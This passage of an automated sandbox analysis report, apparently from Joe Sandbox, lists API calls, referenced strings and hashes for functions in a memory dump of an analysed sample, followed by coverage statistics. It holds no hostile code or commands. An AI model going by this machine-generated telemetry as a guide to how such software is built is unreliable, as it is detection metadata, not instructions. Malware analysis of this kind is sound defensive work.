                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(00940048), ref: 0044DF01
                                                      • ??3@YAXPAX@Z.MSVCRT(00A46F38), ref: 0044DF11
                                                      • ??3@YAXPAX@Z.MSVCRT(00A47748), ref: 0044DF21
                                                      • ??3@YAXPAX@Z.MSVCRT(00A47340), ref: 0044DF31
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID:
                                                      • API String ID: 613200358-0
                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                      APIs
                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: InvalidateMessageRectSend
                                                      • String ID: d=E
                                                      • API String ID: 909852535-3703654223
                                                      • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                      • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                      APIs
                                                      • wcschr.MSVCRT ref: 0040F79E
                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcschr$memcpywcslen
                                                      • String ID: "
                                                      • API String ID: 1983396471-123907689
                                                      • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                      • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                      APIs
                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FilePointer_memicmpmemcpy
                                                      • String ID: URL
                                                      • API String ID: 2108176848-3574463123
                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                      APIs
                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _snwprintfmemcpy
                                                      • String ID: %2.2X
                                                      • API String ID: 2789212964-323797159
                                                      • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                      • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _snwprintf
                                                      • String ID: %%-%d.%ds
                                                      • API String ID: 3988819677-2008345750
                                                      • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                      • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                      APIs
                                                      • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                      • memset.MSVCRT ref: 00401917
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PlacementWindowmemset
                                                      • String ID: WinPos
                                                      • API String ID: 4036792311-2823255486
                                                      • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                      • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                      APIs
                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                      • String ID: _lng.ini
                                                      • API String ID: 383090722-1948609170
                                                      • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                      • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                      APIs
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                      • API String ID: 2773794195-880857682
                                                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                      • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: LongWindow
                                                      • String ID: MZ@
                                                      • API String ID: 1378638983-2978689999
                                                      • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                      • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                      • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                      • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                      APIs
                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                      • memset.MSVCRT ref: 0042BAAE
                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memset
                                                      • String ID:
                                                      • API String ID: 438689982-0
                                                      • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                      • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                      APIs
                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@$memset
                                                      • String ID:
                                                      • API String ID: 1860491036-0
                                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                      APIs
                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                      • free.MSVCRT ref: 0040A908
                                                      • free.MSVCRT ref: 0040A92B
                                                      • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free$memcpy$mallocwcslen
                                                      • String ID:
                                                      • API String ID: 726966127-0
                                                      • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                      • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                      APIs
                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                      • free.MSVCRT ref: 0040B201
                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                      • free.MSVCRT ref: 0040B224
                                                      • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free$memcpy$mallocwcslen
                                                      • String ID:
                                                      • API String ID: 726966127-0
                                                      • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                      • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                      APIs
                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcmp$memcpy
                                                      • String ID:
                                                      • API String ID: 231171946-0
                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                      APIs
                                                      • strlen.MSVCRT ref: 0040B0D8
                                                      • free.MSVCRT ref: 0040B0FB
                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                      • free.MSVCRT ref: 0040B12C
                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free$memcpy$mallocstrlen
                                                      • String ID:
                                                      • API String ID: 3669619086-0
                                                      • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                      • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                      • malloc.MSVCRT ref: 00417407
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                      • free.MSVCRT ref: 00417425
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$freemalloc
                                                      • String ID:
                                                      • API String ID: 2605342592-0
                                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcslen$wcscat$wcscpy
                                                      • String ID:
                                                      • API String ID: 1961120804-0
                                                      • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                      • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                      Execution Graph

                                                      Execution Coverage:2.4%
                                                      Dynamic/Decrypted Code Coverage:19.9%
                                                      Signature Coverage:0.5%
                                                      Total number of Nodes:870
                                                      Total number of Limit Nodes:22
